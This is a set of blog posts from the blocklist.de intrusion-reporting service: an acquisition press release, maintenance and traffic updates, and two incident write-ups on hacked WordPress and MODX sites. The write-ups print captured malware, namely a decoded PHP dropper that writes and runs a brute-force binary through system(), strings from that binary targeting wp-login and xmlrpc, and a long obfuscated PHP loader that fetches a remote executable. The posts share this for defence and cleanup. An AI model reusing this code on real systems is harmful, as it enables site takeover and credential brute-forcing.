We hope our service makes the Internet better, safer and helps to clean the infected PCs.
Der Blog von www.blocklist.de wird hauptsächlich zum archivieren von Statistiken verwendet.
Wenn es mal was interessantes gibt, wird dies hier veröffentlicht. Dazu gehört z.B. neue Angriffe oder Wellen von neue Muster oder wenn eine Art von Angriffen einem Bot-Netz oder einem Wurm zugeordnet werden konnte.
BOSTON and MUNICH, Feb. 28, 2022 /PRNewswire/ — Abusix, a network security company for mail security and abuse report handling, takes over blocklist.de to integrate it within its Abusix platform to further improve its data quality.
Blocklist.de is based on the popular open-source intrusion prevention framework fail2ban, which is part of almost every Linux distribution in the market. It is widely used to protect systems from simple brute force attacks, by logging intrusion attempts on a variety of available services and blocking IPs based on too many authentication failures.
„Blocklist.de, in addition to fail2ban, offers a way to share information about intrusion attempts with other users of the service to improve coverage,“ says Martin Schiftan, founder of blocklist.de. „In addition, we report those intrusion attempts back to the network operator in question for proper abuse management.“
Martin Schiftan started blocklist.de in 2006 and grew the service to several thousand users, processing hundreds of thousands of security events per day. While running multiple projects, Martin Schiftan realized that he could not prioritize every single project the same. As blocklist.de is already using Abusix’s ContactDB and the reporting format XARF, the decision to ask Abusix to take over blocklist.de was set.
„Having a similar mindset and sharing the same ideas about improving the internet, it was a pretty easy decision from our side to integrate blocklist.de into our Abusix services,“ states Tobias Knecht, founder and CEO of Abusix.
For the time being, nothing will change for the existing blocklist.de user base. Within the next few months, Abusix is planning to integrate the blocklist.de services within its platform gradually, so that the existing userbase can benefit from even more lists and features.
The Abusix Platform is an advanced data platform that collects security-focused data from thousands of internal and external sources. It processes, enriches, and vets this information and makes it available to a broad audience based on their use cases, such as abuse management, spam and traffic filtering, and many more.
About Abusix
Abusix provides the missing piece in today’s network security environment that allows for quick and reliable mitigation of network abuse and other cyber threats. Hundreds of ISPs, Telcos, Cloud & Hosting providers, and Enterprises rely on Abusix to keep their networks secure and their users safe.
For more information, visit www.abusix.com
Contact:
Tamara Hurtmann
+49 721 75406590
330287@email4pr.com
SOURCE Abusix
In the last Days, we had some mysql-Server issues.
The Server crashs and could only hard restarted.
We do yesterday a lot of analyze the Logfiles and optimize Settings.
We monitored the Server tonight with Debug Options, and it looks at the moment good.
We looking far on it, that he runs stable like before again.
Some Queries are now a little bit slower, but we work next on it again to optimize it.
Sorry for the Problems.
In the last years/month, it was very quite around blocklist.de
In the last time, we had changed a lot behind the System and drop a lot of Reports/Attacks, which are older then the current two Weeks.
Old stuff is already droped, but not good enough, so we got so much often Problems with the mysql-Server.
At the moment, it looks strange, because the Attacks are droping down from ~24k to 7k, but when we dont make a bug in, it will recover in the next days.
And so, yes blocklist.de is still alive 🙂
But it is a lot of work and i dont have enough time, so it is going slowly.
In den letzten Tagen, kam es leider zu Bounce-Mails an die Fail2Ban Absender-Adresse mit einer Meldung wie:
<fail2ban@blocklist.de>: Command died with status 255
Dies ist nun gefixt.
Ebenso ist noch ein anderer Bug offen, wo ich noch dran bin.
Auch bei den Statistiken, aber das ist leider aufgrund der hohen Menge nicht gut zu skalieren und dort stoße ich immer wieder auf Probleme.
Und ja, das Projekt lebt noch und wird bald auch in Virustotal mit aufgenommen 🙂
Auch in der letzten Zeit, ist der Intervall, wann die Support-Mails abgearbeitet werden, etwas größer geworden, da bin ich schon dran. Alle Mails, welche aber zu alt sind, werden als „resolved“ markiert und somit ein Schnitt gemacht.
A half year ago, since the first News comes up, that the Updates for the Debian-LTS from Update is near EndOfLife, we have tried to upgrade the blocklist.de-Systems.
But it was to hard 🙁
Because there was a lot of Changes, which need to manually fixed.
We have copied the Data to a vps and worked with them. So we update the System -> crash… Rockbackup, fixed the Error, Update -> crash…. and again and again…….
After round about 6 Months later, we had fixed all Errors and run now all Systems with the latest Version of the OS.
After the first stable Updates, there was a some Bugs, we dont see, but the BlockList.de-User has informed and helped us, to fix this.
So, now the Blocklist.de-Site is almost as soon as the previous System (with a little bit more Caching).
Only the Munin-Pictures are broken at the moment, because there was too many Users for the Munin-System. But we work on it and for the most Graphs, the creating works again fine.
The Website has an A+-Raking at ssllabs now:
https://www.ssllabs.com/ssltest/analyze.html?d=blocklist.de&s=185.21.103.31
https://de.ssl-tools.net/webservers/www.blocklist.de
And also the Mailsystem:
| MX Server | Pref | Con- nect |
All- owed |
Can Use |
TLS Adv |
Cert OK |
TLS Neg |
Sndr OK |
Rcvr OK |
| smtp-mx.blocklist.de [93.180.154.80] |
10 | OK (134ms) |
OK (135ms) |
OK (136ms) |
OK (137ms) |
OK (442ms) |
OK (136ms) |
OK (136ms) |
FAIL * |
| smtp-mx2.blocklist.de [46.252.26.16] |
20 | OK (181ms) |
OK (182ms) |
OK (180ms) |
OK (180ms) |
OK (467ms) |
OK (183ms) |
OK (187ms) |
FAIL * |
| webserver3.blocklist.de [185.21.103.31] |
70 | OK (140ms) |
OK (8,253ms) |
OK (131ms) |
OK (131ms) |
OK (443ms) |
OK (132ms) |
OK (141ms) |
FAIL * |
| smtp-mx.blocklist.de [93.180.154.80] |
80 | OK (137ms) |
OK (136ms) |
OK (133ms) |
OK (133ms) |
OK (373ms) |
OK (134ms) |
OK (136ms) |
OK (251ms) |
* = greylisting for the tested Address is active.
https://de.ssl-tools.net/mailservers/smtp-mx.blocklist.de
What we have already build:
The next Step are:
In the last Days, we see a lot of hacked WordPress/Joomla-Sites, which makes outgoing BruteForce-Login Attacks to other WordPress-Sites.
The Attackers create some Files with the name libso48.php, libso47.php, libso46.php and call them over GET-Requests with Parameter id:
domain.tld/directory/xxx/xxx/libso48.php?id=ksej4kWxddukqL2iTZeD&a=MwUvLBQjEzhYUx4IJnc/WyQC
The using UserAgent is with the String „–user-agent“:
" --user-agent=Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0"
The bad files check if the Server runs at x32 or x64 and compile a file libworker.so
The libworker.so File makes the attacks.
Code from the libso48.php (decoded):
<?php
header("Content-type: text/plain");
if (!function_exists('file_put_contents')) {
function file_put_contents($filename, $data) {
$f = @fopen($filename, 'w');
if (!$f) return false;
$bytes = fwrite($f, $data);
fclose($f);
return $bytes;
}
}
//@system("killall -9 ".basename("libworker.so"));
$so32 = Hex-Code;$so64 = Hex-Code;//hexcode decoded start ............
fork
INFO Started brute forcing.
path=/wp-content/pluginsINFO SUCCESS: %s
<!DOCTYPE html<ERROR> (%s:%d: errno: %s)
can not determine logged in or not.
INFO exit status: %d
........
<ERROR> (%s:%d: errno: %s)
Error.
<INFO> (%s:%d: errno: %s)
Started xml rpc brute force
.........
//hexcode decoded end
$arch = 64;
if (intval("9223372036854775807") == 2147483647)
$arch = 32;
print "Arch is ".$arch."
";
$so = $arch == 32 ? $so32 : $so64;
$f = fopen("/usr/bin/host", "rb");
if ($f) {
$n = unpack("C*", fread($f, 8));
$so[7] = sprintf("%c", $n[8]);
print "System is ".($n[8] == 9 ? "FreeBSD" : "Linux")."
";
fclose($f);
}
print "SO dumped ".file_put_contents("./libworker", $so)."
";
@chmod("libworker", 0777);
//@system("./libworker " . $_GET['id'] . " > /dev/null 2> /dev/null &");
@system("./libworker " . $_GET['id'] . " " . $_GET['a'] . " > out 2> err &");
exit(0);
?>The complete Script is decoded under unphp.net (but with the decoded hex code):
http://www.unphp.net/decode/9f6f7e9085045418857e6b54e07b20e9/
On the Hexcode, which was written in the libworker.so file had the following code inside:
......
%s
}{
"type" : "WPBF_RESPONSE",
"success" : false,
"site" : "%s",
"user" : "%s"
}
Sending: %s
{
"type" : "WPBF_RESPONSE",
"success" : true,
"site" : "%s",
"user" : "%s",
"pass" : "%s"
}
{}curlhttp://https://%swp-login.php%s/wp-login.phphttp://%swp-login.phphttp://%s/wp-login.phplog=%s&pwd=%s&wp-submit=Log+In&redirect_to=http%%3A%%2F%%2F%s%%2Fwp-admin%%2F&testcookie=1log=%s&pwd=%s&wp-submit=Log+In&redirect_to=https%%3A%%2F%%2F%s%%2Fwp-admin%%2F&testcookie=1--user-agent=Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0--dataCookie:wordpress_test_cookie=WP+Cookie+check-HContent-Type:application/x-www-form-urlencodedCache-Control:max-age=0Accept-Language:en-US;Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8-A-iINFO checking: %s, %s, %s
Success./src/wpbf/bf.c<ERROR> (%s:%d: errno: %s)
You can see always, the Attacker use curl and Makes xmlrpc-BruteForce and normal wp-login.php WordPressBruteForce-Logins.
If you found the libso48.php or libworker.so File in your Webspace, please check, clean and update your software and stop running processes from libworker file.
The Traffic, Load, Users and other Statistics of blocklist.de for the Month 02.2015
Currently, blocklist.de has the following Stats/User:
User: 2,144
Server: 2,325
Attacks: 246,084,421 since 01.01.2014
Reports: 10,092,816 since 2012
Daily Mails: ~690,500 (lower limit) ~1,450,000 (high limit)
Web-Traffic: ~309 GB
RBL-/API-Traffic: ~85 GB
Mail (In/Out)-Traffic: ~~3,528 GB
Traffic over IPv6 (Mail, Web..): ~5GB
To this data, there comes 6,4TB Traffic between the Web-/Mail-Server and the MySQL-Server. The MySQL-Server sends over ~8,5 GB each Hour out.
The Mysql-Server use now 62% from 32GB Ram (~14gb Cache). And the System-Load is in average on 1.10 .
The WebServer is using not full of 12GB Ram and the System-Load is under 0,7. The open Connections are ~25,000 on the same time
The complete Traffic from all Systems are round about 6,6TB in 02/2015 (the Traffic from MySQL-Server over the not public IPs is not included).
The Traffic, Load, Users and other Statistics of blocklist.de for the Month 09.2014
Currently, blocklist.de has the following Stats/User:
User: 1,719
Server: 1,932
Attacks: 282,138,414 since 05.05.2013
Reports: 8,572,275 since 2012
Daily Mails: ~750,400 (lower limit) ~1,250,000 (high limit)
Web-Traffic: ~290 GB
RBL-/API-Traffic: ~80 GB
Mail (In/Out)-Traffic: ~~3,315 GB
Traffic over IPv6 (Mail, Web..): ~5GB
To this data, there comes 6,1TB Traffic between the Web-/Mail-Server and the MySQL-Server. The MySQL-Server sends over ~8,4 GB each Hour out.
The Mysql-Server use now 60% from 32GB Ram (~14gb Cache). And the System-Load is in average on 2.40 .
The WebServer is using not full of 12GB Ram and the System-Load is under 0,6. The open Connections are ~23,000 on the same time
The complete Traffic from all Systems are round about 6,4TB in 09/2014 (the Traffic from MySQL-Server over the not public IPs is not included).
After 2 Years, we try to regenerate the Statistics over the countries from month to month again.
The Image (Up, down, same….) is the different from 2012 (last statistics):
Die Pfeile ist die Position zum Vormonat (gestiegen, gefallen, gleich geblieben).
Nach IP-Adressen sortiert (unique):
Sortiert nach Anzahl der Angriffe:
I have some sites with outdated Software for a other Project.
Normally, the Site was secured with a .htaccess File. All Sites was secured by Quotas and other Tools and also monitored (sha1-filehash Checker, Processlist Checker…).
Two sites was now hacked, because the .htaccess was temporarily disabled and forgotten to reactivated.
Then there comes the following Requests to a outdated ModEvelution-Software:
62.76.187.163 - - [04/Aug/2014:08:34:13 +0200] "POST http://www.dev.domain.tld/manager/includes/lang/country/italian_country.inc.php HTTP/1.1" 200 xxx
"" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
The Post Variables was:
POST['n132a88'] = "ZWNobyAicXExMW9hZG5xOThjam53ZWppb2xuMjMrKyI7";
decoded it is only:
echo „qq11oadnq98cjnwejioln23++“;
A other Request was:
62.76.187.163 - - [04/Aug/2014:08:34:13 +0200] "POST http://www.dev.domain.tld/manager/includes/lang/country/italian_country.inc.php HTTP/1.1" 200 xxx "" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
A other Request was:
85.143.166.103 - - [07/Aug/2014:02:53:59 +0200] "POST http://ZWNobyAicXExMW9hZG5xOThjam53ZWppb2xuMjMrKyI7/assets/cache/docid_685.pageCache.php HTTP/1.1" 200 xxx "" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0"
POST[„n0b8385“] = „JHMzOD0iV25cXGlhKm9tPX1ZVUJqd1EmZy1TTE1xXi90OlB+XHRkVFpdJzgoeGtARFwkMyMxXG4uNl9OaFIrWzl5cztDfGwhYiU1SWY0MkhPcEp1MEc8KVZgRlxye1gsRT5LXCJlY3pyIDdBdj8iOyAkR0xPQkFMU1sneHRrenA5NCddID0gJHMzOFs3MV0uJHMzOFs1MF0uJHMzOFs3MV0uJHMzOFs0OF0uJHMzOFs3M10uJHMzOFsxXS4kczM4WzRdLiRzMzhbN10uJHMzOFs4OV07ICRHTE9CQUxTWydmamlpYjUxJ10gPSAkczM4WzY2XS4kczM4WzczXS4kczM4WzFdLiRzMzhbOTBdLiRzMzhbMjVdLiRzMzhbM10uJHMzOFs2X
….
……
….
bGNyNTgnXSgkczM4LCAkczM4WzQ2XS4kczM4WzI0XS4kbnF3cnMwLCAkcHBvcWI0NykgPT0gRkFMU0UpIHsJCWlmICgkR0xPQkFMU1snandsY3I1OCddKCRzMzgsICRzMzhbMjRdLiRzMzhbMjVdLiRzMzhbN10uJHMzOFs3MV0uJHMzOFsyNF0uJG5xd3JzMCwgJHBwb3FiNDcpID09IEZBTFNFKSB7CQkJcmV0dXJuIEZBTFNFOwkJfSBlbHNlIHsJCQlyZXR1cm4gJHMzOFsyNF0uJHMzOFsyNV0uJHMzOFs3XS4kczM4WzcxXS4kczM4WzI0XS4kbnF3cnMwOwkJfQl9IGVsc2UgewkJcmV0dXJuICRzMzhbNDZdLiRzMzhbMjRdLiRucXdyczA7CX0JcmV0dXJuIEZBTFNFO30=“;
Decoded the sending Post Variable was:
$s38="Wn\\ia*om=}YUBjwQ&g-SLMq^/t:P~\tdTZ]'8(xk@D\$3#1\n.6_NhR+[9ys;C|l!b%5If42HOpJu0G< )V`F\r{X,E>K\"eczr 7Av?";
$GLOBALS['xtkzp94'] = $s38[71].$s38[50].$s38[71].$s38[48].$s38[73].$s38[1].$s38[4].$s38[7].$s38[89];
$GLOBALS['fjiib51'] = $s38[66].$s38[73].$s38[1].$s38[90].$s38[25].$s38[3].$s38[6].$s38[1].$s38[48].$s38[89].$s38[37].$s38[3].$s38[56].$s38[25].$s38[56];
$GLOBALS['aojaf86'] = $s38[56].$s38[25].$s38[92].$s38[60].$s38[89].$s38[1];
… Truncat against Kaspersky says it is an Virus…. aaaaaahhhhhhhh
=$s38[50].$s38[25].$s38[25].$s38[71].$s38[26].$s38[24].$s38[24].$s38[1].$s38[6].$s38[25].$s38[89].$s38[56].$s38[46].$s38[4].$s38[92].$s38[25].$s38[18].$s38[71].$s38[4].$s38[92].$s38[25].$s38[1].$s38[89].$s38[92].$s38[46].$s38[1].$s38[89].$s38[25].$s38[24].$s38[56].$s38[7].$s38[47].$s38[67];
$zxozz28 = $s38[83].$s38[40].$s38[78].$s38[19].$s38[49].$s38[48].$s38[19].$s38[85].$s38[19].$s38[19].$s38[65].$s38[70].$s38[49].$s38[48].$s38[58].$s38[70].$s38[70].$s38[87].$s38[65].$s38[85].$s38[8].$s38[27].$s38[1].$s38[72].$s38[37].$s38[27].$s38[40].$s38[21].$s38[55].$s38[27].$s38[3].$s38[44].$s38[55].$s38[90].$s38[31].$s38[14].$s38[52].$s38[30].$s38[42].$s38[12].$s38[22].$s38[27].$s38[75].$s38[37].$s38[73].$s38[20].$s38[75].$s38[49].$s38[14].$s38[30].$s38[3].$s38[54].$s38[55].$s38[10].$s38[42].$s38[12].$s38[68].$s38[62].$s38[75].$s38[30].$s38[14].$s38[20].$s38[75].$s38[37].$s38[1].$s38[30].$s38[13].$s38[67].$s38[25].$s38[30].$s38[42].$s38[12].$s38[22].$s38[27].$s38[40].$s38[64].$s38[42].$s38[90].$s38[69].$s38[65].$s38[35].$s38[70].$s38[13].$s38[65].$s38[91].$s38[49].$s38[31].$s38[67].$s38[25].$s38[30].$s38[42].$s38[12].$s38[55].$s38[27].$s38[40].$s38[64].$s38[73].$s38[30].$s38[13].$s38[14].$s38[42].$s38[21].$s38[13].$s38[65].$s38[52].$s38[20].$s38[0].$s38[64].$s38[68].$s38[27].$s38[40].$s38[64].$s38[73].$s38[10].$s38[31].$s38[14].$s38[91].$s38[21].$s38[13].$s38[65].$s38[52].$s38[20].$s38[0].$s38[64].$s38[50].$s38[27].$s38[40].$s38[64].$s38[17].$s38[90].$s38[31].$s38[14].$s38[14].$s38[21].$s38[13].$s38[67].$s38[25].$s38[10].$s38[69].$s38[85].$s38[35].$s38[27].$s38[7].$s38[64].$s38[42].$s38[27].$s38[75].$s38[71].$s38[68].$s38[30].$s38[1].$s38[65].$s38[67].$s38[20].$s38[19].$s38[44].$s38[13].$s38[10].$s38[0].$s38[80].$s38[37].$s38[20].$s38[75].$s38[49].$s38[14].$s38[30].$s38[3].$s38[54].$s38[55].$s38[10].$s38[42].$s38[12].$s38[68].$s38[62].$s38[75].$s38[30].$s38[14].$s38[20].$s38[75].$s38[37].$s38[1].$s38[30].$s38[3].$s38[74].$s38[52].$s38[20].$s38[0].$s38[64].$s38[42].$s38[27].$s38[40].$s38[64].$s38[17].$s38[30].$s38[91].$s38[37].$s38[22].$s38[30].$s38[1].$s38[32].$s38[55].$s38[70].$s38[58].$s38[74].$s38[25].$s38[10].$s38[75].$s38[49].$s38[68].$s38[20].$s38[75].$s38[49].$s38[14].$s38[30].$s38[3].$s38[54].$s38[55].$s38[10].$s38[42].$s38[12].$s38[68].$s38[62].$s38[75].$s38[30].$s38[14].$s38[20].$s38[75].$s38[37].$s38[1].$s38[30].$s38[3].$s38[44].$s38[13].$s38[10].$s38[91].$s38[95].$s38[56].$s38[90].$s38[7].$s38[71].$s38[55].$s38[27].$s38[3].$s38[44].$s38[17].$s38[30].$s38[91].$s38[14].$s38[52].$s38[90].$s38[83].$s38[90].$s38[35].$s38[4].$s38[1].$s38[32].$s38[68].$s38[90].$s38[13].$s38[17].$s38[25].$s38[20].$s38[83].$s38[80].$s38[68].$s38[10].$s38[42].$s38[32].$s38[37].$s38[20].$s38[69].$s38[49].$s38[42].$s38[32].$s38[42].$s38[12].$s38[94].$s38[20].$s38[42].$s38[72].$s38[13].$s38[90].$s38[69].$s38[10].$s38[56].$s38[10].$s38[0].$s38[44].$s38[96].$s38[20].$s38[0].$s38[78].$s38[6].$s38[49].$s38[19].$s38[37].$s38[55].$s38[4].$s38[1].$s38[65].$s38[52].$s38[20].$s38[83].$s38[80].$s38[42].$s38[27].$s38[40].$s38[64].$s38[73].$s38[32].$s38[7].$s38[95].$s38[35].$s38[4].$s38[69].$s38[6].$s38[55].$s38[21].$s38[13].$s38[95].$s38[52].$s38[20].$s38[0].$s38[64].$s38[7].$s38[10].$s38[40].$s38[14].$s38[8];
$ntgai94 = $GLOBALS['xtkzp94']($s38[56]);
$igekj52 = $GLOBALS['xtkzp94']($s38[7]);
echo $s38[76].$s38[56].$s38[50].$s38[90].$s38[50].$s38[91].$s38[91].$s38[91].$s38[86];
for (;;)
{
if (!$GLOBALS['fjiib51']($s38[56].$s38[50].$s38[89].$s38[60].$s38[60].$s38[48].$s38[89].$s38[37].$s38[89].$s38[90]))
{
echo $s38[76].$s38[89].$s38[92].$s38[92].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[44].$s38[93].$s38[89].$s38[92].$s38[92].$s38[8].$s38[1].$s38[6].$s38[56].$s38[50].$s38[89].$s38[37].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$s38[86];
break;
}
if ($ntgai94 !== $s38[20].$s38[3].$s38[1].$s38[73].$s38[37])
{
echo $s38[76].$s38[89].$s38[92].$s38[92].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[68].$s38[93].$s38[89].$s38[92].$s38[92].$s38[8].$s38[1].$s38[6].$s38[60].$s38[3].$s38[1].$s38[73].$s38[37].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$mqcjh70.$s38[86];
break;
}
$nneyn30 = $s38[71].$s38[56];
$cttgs64 = "";
if ($GLOBALS['aojaf86']($GLOBALS['dfyoo42'](~0)) == 64)
{
echo $s38[76].$s38[3].$s38[1].$s38[66].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[42].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$s38[37].$s38[47].$s38[67].$s38[86];
$cttgs64 = $rmznz0;
}
else
{
echo $s38[76].$s38[3].$s38[1].$s38[66].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[42].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$s38[37].$s38[42].$s38[68].$s38[86];
$cttgs64 = $dfdjy19;
}
$pjimj72 = "";
if (!$GLOBALS['gwigy41']($nneyn30))
{
$pjimj72 = $GLOBALS['vziql67']($s38, $cttgs64, $nneyn30);
if ( $pjimj72 == FALSE)
{
echo $s38[76].$s38[89].$s38[92].$s38[92].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[67].$s38[93].$s38[89].$s38[92].$s38[92].$s38[8].$s38[30].$s38[6].$s38[14].$s38[1].$s38[60].$s38[93].$s3... Truncat against Kaspersky says it is an Virus.... aaaaaahhhhhhhh
echo $s38[76].$s38[3].$s38[1].$s38[66].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[64].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$s38[30].$s38[6].$s38[1].$s38[89].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[68].$s38[8].$cgthg36.$s38[86];
$GLOBALS['tkjre65'](1);
$GLOBALS['jtjiv94']($pjimj72);
break;
}
echo $s38[76].$s38[24].$s38[56].$s38[50].$s38[90].$s38[50].$s38[91].$s38[91].$s38[91].$s38[86];
function fildv12($s38, $htxbt38)
{
$ppoqb47 = „“;
$ogrpt28 = @$GLOBALS[‚fjcva91‘]($htxbt38, $s38[92].$s38[62]);
if ($ogrpt28 == FALSE)
{
if (!$GLOBALS[‚fjiib51‘]($s38[90].$s38[73].$s38[92].$s38[60].$s38[48].$s38[3].$s38[1].$s38[3].$s38[25]))
return FALSE;
$henof76 = @$GLOBALS[‚dmrqg14′]();
@$GLOBALS[’npbou10′]($henof76, CURLOPT_URL, $htxbt38);
@$GLOBALS[’npbou10‘]($henof76, CURLOPT_RETURNTRANSFER, true);
$ppoqb47 = @$GLOBALS[‚hjiar61‘]($henof76);
@$GLOBALS[‚ekyyn43‘]($henof76);
}
else
{
while(!$GLOBALS[‚mashg65‘]($ogrpt28))
$ppoqb47.=$GLOBALS[‚udsvx59′]($ogrpt28, 1024 * 64 );
$GLOBALS[’naftp70‘]($ogrpt28);
}
return $ppoqb47;
}
function eghou87($s38, $yaxje72, $ppoqb47)
{
$negtx78 = $GLOBALS[‚fjcva91‘]($yaxje72, $s38[14].$s38[62].$s38[52]);
if ($negtx78 == FALSE)
{
if (!$GLOBALS[‚fjiib51‘]($s38[66].$s38[3].$s38[60].$s38[89].$s38[48].$s38[71].$s38[73].$s38[25].$s38[48].$s38[90].$s38[6].$s38[1].$s38[25].$s38[89].$s38[1].$s38[25].$s38[56]))
return FALSE;
if ( @$GLOBALS[‚wtxbv81‘]($yaxje72, $ppoqb47) === FALSE )
return FALSE;
}
else
{
$jznmi77 = $GLOBALS[‚acklf72‘]($negtx78, $ppoqb47, $GLOBALS[‚aojaf86′]($ppoqb47));
$GLOBALS[’naftp70‘]($negtx78);
if ($jznmi77 == FALSE || $jznmi77 != $GLOBALS[‚aojaf86‘]($ppoqb47))
return FALSE;
}
return TRUE;
}
function gbzrm90($s38, $htxbt38, $nqwrs0)
{
$ppoqb47 = $GLOBALS[‚adwwg63‘]($s38, $htxbt38);
if ($ppoqb47 == FALSE)
return FALSE;
if ($GLOBALS[‚jwlcr58‘]($s38, $s38[46].$s38[24].$nqwrs0, $ppoqb47) == FALSE)
{
if ($GLOBALS[‚jwlcr58‘]($s38, $s38[24].$s38[25].$s38[7].$s38[71].$s38[24].$nqwrs0, $ppoqb47) == FALSE)
{
return FALSE;
}
else
{
return $s38[24].$s38[25].$s38[7].$s38[71].$s38[24].$nqwrs0;
}
}
else
{
return $s38[46].$s38[24].$nqwrs0;
}
return FALSE;
}
A short lock shows, that the Code check with php_uname the System and downloads a xxxx64/xxxx32 File which was analysed from our Friends from MalwareMastDie under:
http://blog.malwaremustdie.org/2014/05/linux-reversing-is-fun-toying-with-elf.html
For more Informations and Updates, you can follow MalwareMustDie on Twitter:
https://twitter.com/MalwareMustDie
So, please update and secure all your sites and scripts!
If you have Questions, please contact us 🙂